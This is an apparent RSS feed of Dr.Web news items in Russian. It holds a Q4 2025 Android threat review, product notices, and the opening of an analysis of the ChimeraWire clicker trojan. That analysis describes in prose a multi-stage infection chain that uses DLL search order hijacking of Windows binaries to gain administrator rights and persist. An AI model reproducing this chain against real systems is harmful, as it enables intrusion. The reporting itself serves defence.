&lt;p&gt;Самым распространенным потенциально опасным ПО в IV квартале стали приложения &lt;b&gt;Tool.NPMod&lt;/b&gt;, модифицированные при помощи утилиты NP Manager. Она обфусцирует код модов и добавляет в них специальный модуль, позволяющий обходить проверку цифровой подписи после модификации приложений. Среди рекламных программ лидерство сохранили представители семейства &lt;a href="https://vms.drweb.kz/search/?q=Adware.Adpush&amp;lng=kk"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;. Это специальные программные модули, которые разработчики встраивают в ПО для демонстрации рекламных уведомлений.&lt;/p&gt;

&lt;p&gt;В октябре наши специалисты &lt;a href="https://news.drweb.kz/show/?i=15076" target="_blank"&gt;рассказали&lt;/a&gt; об опасном бэкдоре &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, который злоумышленники встроили в неофициальные модификации мессенджера Telegram X и распространяли как через вредоносные сайты, так и через сторонние каталоги Android-приложений. Вредоносная программа похищает логины и пароли от учетных записей Telegram, а также другие конфиденциальные данные. Кроме того, с ее помощью киберпреступники фактически способны управлять аккаунтом жертвы и незаметно выполнять в мессенджере различные действия от ее имени. Например — присоединяться к Telegram-каналам и выходить из них, скрывать новые авторизованные устройства, скрывать определенные сообщения и т. д. &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; управляется в том числе через базу данных Redis, что ранее не встречалось в Android-угрозах. В общей сложности бэкдор заразил порядка 58 000 устройств, среди которых около 3 000 различных моделей смартфонов, планшетов, ТВ-приставок и автомобилей с бортовыми компьютерами на базе Android.&lt;/p&gt;

&lt;p&gt;За минувший квартал антивирусная лаборатория компании «Доктор Веб» выявила в каталоге Google Play новые вредоносные программы, среди которых были трояны &lt;a href="https://vms.drweb.kz/search/?q=Android.Joker&amp;lng=kk"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, подписывающие жертв на платные услуги, и различные программы-подделки &lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, применяемые в мошеннических схемах. В общей сложности их загрузили по меньшей мере 263 000 раз.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Главные тенденции IV квартала&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Рекламные трояны остаются наиболее распространенными Android-угрозами&lt;/li&gt;
        &lt;li&gt;Рост числа атак банковских троянов&lt;/li&gt;
        &lt;li&gt;Распространение опасного бэкдора &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, встроенного в модификации мессенджера Telegram X&lt;/li&gt;
        &lt;li&gt;Появление очередных вредоносных приложений в каталоге Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;По данным Dr.Web Security Space для мобильных устройств&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/december/review_mobile_q4/01_malware_q4_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/review_mobile_q4/01_malware_q4_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.MobiDash&amp;lng=kk"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троянская программа, показывающая надоедливую рекламу. Она представляет собой программный модуль, который разработчики ПО встраивают в приложения.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троянская программа, которая загружает указанный в ее настройках веб-сайт. Известные модификации этого вредоносного приложения загружают сайт онлайн-казино.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.Click&amp;lng=kk"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование вредоносных модов мессенджера WhatsApp, которые незаметно для пользователя могут загружать различные сайты в фоновом режиме.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Packed.57.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование обфускатора, который в том числе используется для защиты вредоносных приложений (например, некоторых версий банковских троянов &lt;b&gt;Android.SpyMax&lt;/b&gt;).&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.Triada&amp;lng=kk"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5847&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование упаковщика для троянов семейства &lt;a href="https://vms.drweb.kz/search/?q=Android.Triada&amp;lng=kk"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;, предназначенного для их защиты от анализа и обнаружения. Чаще всего злоумышленники используют его совместно с вредоносными модами мессенджера Telegram, в которые непосредственно встроены эти трояны.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/december/review_mobile_q4/02_unwanted_q_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/review_mobile_q4/02_unwanted_q_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Program.CloudInject&amp;lng=kk"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Program.CloudInject&amp;lng=kk"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование Android-приложений, модифицированных при помощи облачного сервиса CloudInject и одноименной Android-утилиты (добавлена в вирусную базу Dr.Web как &lt;a href="https://vms.drweb.kz/search/?q=Tool.CloudInject&amp;lng=kk"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Такие программы модифицируются на удаленном сервере, при этом заинтересованный в их изменении пользователь (моддер) не контролирует, что именно будет в них встроено. Кроме того, приложения получают набор опасных разрешений. После модификации программ у моддера появляется возможность дистанционно управлять ими: блокировать, показывать настраиваемые диалоги, отслеживать факт установки и удаления другого ПО и т. д.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Program.FakeAntiVirus&amp;lng=kk"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование рекламных программ, которые имитируют работу антивирусного ПО. Такие программы могут сообщать о несуществующих угрозах и вводить пользователей в заблуждение, требуя оплатить покупку полной версии.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Program.FakeMoney&amp;lng=kk"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование приложений, якобы позволяющих зарабатывать на выполнении тех или иных действий или заданий. Эти программы имитируют начисление вознаграждений, причем для вывода «заработанных» денег требуется накопить определенную сумму. Обычно в них имеется список популярных платежных систем и банков, через которые якобы возможно перевести награды. Но даже когда пользователям удается накопить достаточную для вывода сумму, обещанные выплаты не поступают. Этой записью также детектируется другое нежелательное ПО, основанное на коде таких программ.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Программа для наблюдения за владельцами Android-устройств. Она позволяет читать СМС, получать информацию о телефонных вызовах, отслеживать местоположение устройства и выполнять аудиозапись окружения.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/december/review_mobile_q4/03_riskware_q4_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/review_mobile_q4/03_riskware_q4_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование Android-приложений, модифицированных при помощи утилиты NP Manager. В такие программы внедрен специальный модуль, который позволяет обойти проверку цифровой подписи после их модификации.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Tool.LuckyPatcher&amp;lng=kk"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Утилита, позволяющая модифицировать установленные Android-приложения (создавать для них патчи) с целью изменения логики их работы или обхода тех или иных ограничений. Например, с ее помощью пользователи могут попытаться отключить проверку root-доступа в банковских программах или получить неограниченные ресурсы в играх. Для создания патчей утилита загружает из интернета специально подготовленные скрипты, которые могут создавать и добавлять в общую базу все желающие. Функциональность таких скриптов может оказаться в том числе и вредоносной, поэтому создаваемые патчи могут представлять потенциальную опасность.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Tool.Androlua&amp;lng=kk"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование ряда потенциально опасных версий специализированного фреймворка для разработки Android-программ на скриптовом языке программирования Lua. Основная логика Lua-приложений расположена в соответствующих скриптах, которые зашифрованы и расшифровываются интерпретатором перед выполнением. Часто данный фреймворк по умолчанию запрашивает доступ ко множеству системных разрешений для работы. В результате исполняемые через него Lua-скрипты способны выполнять различные вредоносные действия в соответствии с полученными разрешениями.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/december/review_mobile_q4/04_adware_q4_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/review_mobile_q4/04_adware_q4_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Adware.AdPush&amp;lng=kk"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Adware.Adpush&amp;lng=kk"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Рекламные модули, которые могут быть интегрированы в Android-программы. Они демонстрируют рекламные уведомления, вводящие пользователей в заблуждение. Например, такие уведомления могут напоминать сообщения от операционной системы. Кроме того, эти модули собирают ряд конфиденциальных данных, а также способны загружать другие приложения и инициировать их установку.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Bastion.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование программ-оптимизаторов, которые периодически создают уведомления с вводящими в заблуждение сообщениями о якобы нехватке памяти и ошибках системы с целью показывать рекламу во время «оптимизации».&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Airpush.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Программные модули, встраиваемые в Android-приложения и демонстрирующие разнообразную рекламу. В зависимости от версии и модификации это могут быть рекламные уведомления, всплывающие окна или баннеры. С помощью данных модулей злоумышленники часто распространяют вредоносные программы, предлагая установить то или иное ПО. Кроме того, такие модули передают на удаленный сервер различную конфиденциальную информацию.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Adware.ModAd&amp;lng=kk"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование некоторых модифицированных версий (модов) мессенджера WhatsApp, в функции которых внедрен код для загрузки заданных ссылок через веб-отображение во время работы с мессенджером. С этих интернет-адресов выполняется перенаправление на рекламируемые сайты, например онлайн-казино и букмекеров, сайты для взрослых.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Угрозы в Google Play&lt;/h3&gt;

&lt;p&gt;В течение IV квартала 2025 года вирусные аналитики компании «Доктор Веб» зафиксировали появление в каталоге Google Play более двух десятков вредоносных приложений &lt;a href="https://vms.drweb.kz/search/?q=Android.Joker&amp;lng=kk"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, предназначенных для подписки пользователей на платные услуги. Злоумышленники замаскировали их под различное ПО: мессенджеры, утилиты для оптимизации работы системы, графические редакторы и программы для просмотра фильмов.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/december/review_mobile_q4/05_Android.Joker_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/review_mobile_q4/05_Android.Joker_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Примеры выявленных вредоносных программ &lt;b&gt;Android.Joker&lt;/b&gt;. &lt;b&gt;Android.Joker.2496&lt;/b&gt; был замаскирован под инструмент Useful Cleaner для «очистки мусора» на телефоне, а одна из модификаций &lt;b&gt;Android.Joker.2495&lt;/b&gt; — под проигрыватель фильмов Reel Drama&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Также наши специалисты обнаружили несколько новых программ-подделок из семейства &lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;. Как и ранее, некоторые из них распространились под видом финансовых приложений и загружали мошеннические сайты. Другие такие подделки выдавались за игры. При определенных условиях (например, если IP-адрес пользователя удовлетворял требованиям злоумышленников) они могли загружать сайты букмекерских контор и онлайн-казино.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/december/review_mobile_q4/06_Android.FakeApp.1910_1_Chicken_Road_Fun.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/review_mobile_q4/06_Android.FakeApp.1910_1_Chicken_Road_Fun.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Игра Chicken Road Fun являлась программой-подделкой &lt;b&gt;Android.FakeApp.1910&lt;/b&gt;, и вместо того, чтобы предоставить ожидаемую пользователем функциональность, могла загрузить сайт онлайн-казино&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Для защиты Android-устройств от вредоносных и нежелательных программ пользователям следует установить антивирусные продукты Dr.Web для Android.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q4%202025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15095&amp;lng=kk</guid><title>Обновлено лицензионное соглашение к продукту Dr.Web FixIt!</title><link>https://news.drweb.kz/show/?i=15095&amp;lng=kk&amp;c=5</link><pubDate>Mon, 29 Dec 2025 16:02:32 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Мы обновили лицензионное соглашение к продукту Dr.Web FixIt!. С документом можно ознакомиться по ссылке: &amp;nbsp;&lt;a href="https://license.drweb.kz/agreement/?lng=kk"&gt;https://license.drweb.kz/agreement/&lt;/a&gt;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Dr.Web FixIt! необходим для детального анализа безопасности рабочих станций и серверов под управлением ОС Windows, и устранения выявленных вирусных угроз и потенциальных уязвимостей. Его ключевое преимущество в том, что он может выявлять новейшее вредоносное ПО и программы, используемые для целевых атак, которые не определяются другими инструментами кибербезопасности.&lt;/p&gt;&lt;p&gt;В первую очередь Dr.Web FixIt! предназначен для специалистов, которые проводят мониторинг безопасности компьютерной инфраструктуры и анализируют киберинциденты. Тем не менее, даже при отсутствии в компании специализированной SOC-команды, решение способно как диагностировать угрозу на рабочей станции и/или сервере, так и произвести лечение после обнаружения.&lt;/p&gt;&lt;p&gt;В случае необходимости специалисты «Доктор Веб» помогут проанализировать информацию, полученную с помощью Dr.Web FixIt!. Для этого необходимо приобрести сертификат на экспертное сопровождение задачи.&lt;/p&gt;&lt;p&gt;Приобрести решение можно у&lt;a href="https://partners.drweb.kz/find_partner/?lng=kk"&gt; партнеров&lt;/a&gt; «Доктор Веб».&amp;nbsp;&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15094&amp;lng=kk</guid><title>Крупное обновление сервера централизованного управления для Dr.Web Enterprise Security Suite и Dr.Web Industrial</title><link>https://news.drweb.kz/show/?i=15094&amp;lng=kk&amp;c=5</link><pubDate>Fri, 12 Dec 2025 11:27:10 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Компания «Доктор Веб» выпускает масштабное обновление для сервера в составе Dr.Web Enterprise Security Suite и Dr.Web Industrial 13.0.1.202511120. Оно будет доступно для загрузки с 15 декабря 2025 года. Ключевое изменение — расширение возможностей компонента «Контроль приложений», что поможет существенно усилить защиту пользователей.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;В пакет обновлений мы добавили новые возможности и улучшения. В частности, для пользователей линейки продуктов Dr.Web Enterprise Security Suite и Dr.Web Industrial был расширен список критериев функционального анализа:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;В категории «Запуск приложений» появились запреты на запуск дочерних процессов офисными программами и почтовыми клиентами. Это снижает риск заражения через вредоносные документы и письма, не мешая обычной работе пользователей.&lt;/li&gt;&lt;li&gt;В категории «Запуск скриптовых интерпретаторов» добавлены новые правила, позволяющие блокировать запуск сценариев из офисных приложений и почтовых клиентов, а также ограничивать выполнение скриптов AutoIt, а также Java и Python. Такие ограничения защищают от злоупотребления интерпретаторами, которые часто используются при кибератаках, а также при выполнении нежелательных автоматизаций.&lt;/li&gt;&lt;li&gt;В категорию «Загрузка драйверов» включен запрет на установку драйверов без WHQL подписи, что помогает предотвратить использование неподписанных модулей и загрузку потенциально опасного кода в ядро системы.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Обновленный набор правил дает администраторам средств защиты более гибкие инструменты для предотвращения вредоносной активности и повышения устойчивости инфраструктуры к современным угрозам.&lt;br&gt;Также мы избавились от ряда выявленных ранее проблем. Среди них:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;исправлена ошибка, которая могла возникнуть при обновлении ПО Сервера Dr.Web под ОС Windows в условиях ограниченных вычислительных ресурсов;&lt;/li&gt;&lt;li&gt;исправлена ошибка, из-за которой при выборе настройки «Обновлять только базы» в разделе Центра управления «Ограничения обновлений» не обновлялся продукт репозитория «Базы контент-фильтров для UNIX»;&lt;/li&gt;&lt;li&gt;исправлена логика обновления кеша ответов DNS-сервера.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Подробный перечень исправлений вы сможете прочитать в этом &lt;a href="https://f2.drweb.com/get+meta+file/?k=55b93831647508c05be897981b98b0b4&amp;amp;sdl=ru&amp;amp;sdf=t"&gt;документе&lt;/a&gt;.&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15090&amp;lng=kk</guid><title>Беллерофонту такое и не снилось. Троян ChimeraWire накручивает популярность сайтов, искусно притворяясь человеком</title><link>https://news.drweb.kz/show/?i=15090&amp;lng=kk&amp;c=5</link><pubDate>Mon, 08 Dec 2025 09:44:54 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;8 декабря 2025 года&lt;/b&gt;&lt;/p&gt;

&lt;h3&gt;Введение&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;В ходе анализа одной из партнерских программ специалисты компании «Доктор Веб» обнаружили уникальное ВПО с функциональностью кликера, получившее наименование &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;. Оно работает на компьютерах под управлением ОС Windows и основано на проектах с открытым исходным кодом &lt;a href="https://github.com/sohaha/zlsgo" target="_blank"&gt;zlsgo&lt;/a&gt; и &lt;a href="https://go-rod.github.io/" target="_blank"&gt;Rod&lt;/a&gt; для автоматизированного управления веб-сайтами и веб-приложениями.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; позволяет злоумышленникам имитировать действия пользователей и накручивать поведенческий фактор веб-сайтов, искусственно поднимая их рейтинг в выдаче поисковых систем. Для этого вредоносная программа выполняет поиск нужных интернет-ресурсов в системах Google и Bing, после чего открывает их. Она также имитирует действия пользователей, самостоятельно нажимая на ссылки на загруженных сайтах. Троян совершает все вредоносные действия через браузер Google Chrome, который он скачивает с определенного ресурса и запускает в скрытом режиме отладки по протоколу WebSocket.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; попадает на компьютеры в результате работы нескольких вредоносных программ-загрузчиков. Они используют различные техники повышения привилегий на основе эксплуатации уязвимостей класса DLL Search Order Hijacking, а также антиотладочные приемы с целью избежать обнаружения. Наша антивирусная лаборатория отследила как минимум 2 цепочки заражения с их участием. В одной из них центральное место занимает вредоносный скрипт &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;, а в другой — вредоносная программа &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;, которая по принципу работы схожа с &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; и фактически выступает его альтернативой.&lt;/p&gt;

&lt;p&gt;В данном исследовании мы рассмотрим особенности &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; и вредоносных программ, которые доставляют его на устройства пользователей.&lt;/p&gt;

&lt;h3&gt;Первая цепочка заражения&lt;/h3&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/01_ChimeraWire_chain1_ru.png"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/01_ChimeraWire_chain1_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Схема, иллюстрирующая первую цепочку заражения&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Первая цепочка начинается с трояна &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.54600&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt;. Он проверяет, не работает ли в искусственной среде, и завершает работу, если обнаруживает признаки виртуальной машины или режима отладки. Если таких признаков нет, троян скачивает с C2-сервера ZIP-архив &lt;span class="string"&gt;python3.zip&lt;/span&gt;. В нем находится вредоносный Python-скрипт &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;, а также необходимые для его работы вспомогательные файлы — в частности, вредоносная библиотека &lt;span class="string"&gt;ISCSIEXE.dll&lt;/span&gt; (&lt;a href="https://vms.drweb.kz/search/?q=Trojan.Starter.8377&amp;lng=kk"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt;). &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.54600&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt; распаковывает архив и запускает скрипт. Тот является второй ступенью заражения и представляет собой загрузчик, который скачивает с C2-сервера следующую стадию.&lt;/p&gt;

&lt;p&gt;Поведение &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; зависит от того, какими правами он обладает при запуске. Если скрипт запущен без прав администратора, он пытается их получить. Для этого извлеченный вместе с ним &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Starter.8377&amp;lng=kk"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt; копируется в каталог &lt;span class="string"&gt;%LOCALAPPDATA%\Microsoft\WindowsApps&lt;/span&gt;. Кроме того, создается скрипт &lt;span class="string"&gt;runs.vbs&lt;/span&gt;, который в дальнейшем будет использован для повторного запуска &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Далее &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; запускает системное приложение &lt;span class="string"&gt;%SystemRoot%\SysWOW64\iscsicpl.exe&lt;/span&gt;. Из-за наличия в нем уязвимости класса DLL Search Order Hijacking оно автоматически загружает троянскую библиотеку &lt;span class="string"&gt;ISCSIEXE.dll&lt;/span&gt;, имя которой совпадает с именем легитимного компонента ОС Windows.&lt;/p&gt;

&lt;p&gt;В свою очередь, &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Starter.8377&amp;lng=kk"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt; запускает VBS-скрипт &lt;span class="string"&gt;runs.vbs&lt;/span&gt;, и тот повторно исполняет &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; — уже с правами администратора.&lt;/p&gt;

&lt;p&gt;При запуске с необходимыми привилегиями &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; скачивает с C2-сервера защищенный паролем архив &lt;span class="string"&gt;onedrive.zip&lt;/span&gt;. В нем находится следующая стадия заражения — вредоносная программа &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.54318&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt; в виде библиотеки с именем &lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt; — и необходимые для ее работы вспомогательные файлы (например, легитимное приложение &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; из ОС Windows с действительной цифровой подписью, относящееся к ПО OneDrive).&lt;/p&gt;

&lt;p&gt;После распаковки архива &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; создает задачу в системном планировщике на запуск программы &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; при старте системы. Далее он запускает это приложение. Из-за наличия в нем уязвимости DLL Search Order Hijacking оно автоматически загружает вредоносную библиотеку &lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt;, имя которой совпадает с именем компонента ПО OneDrive.&lt;/p&gt;

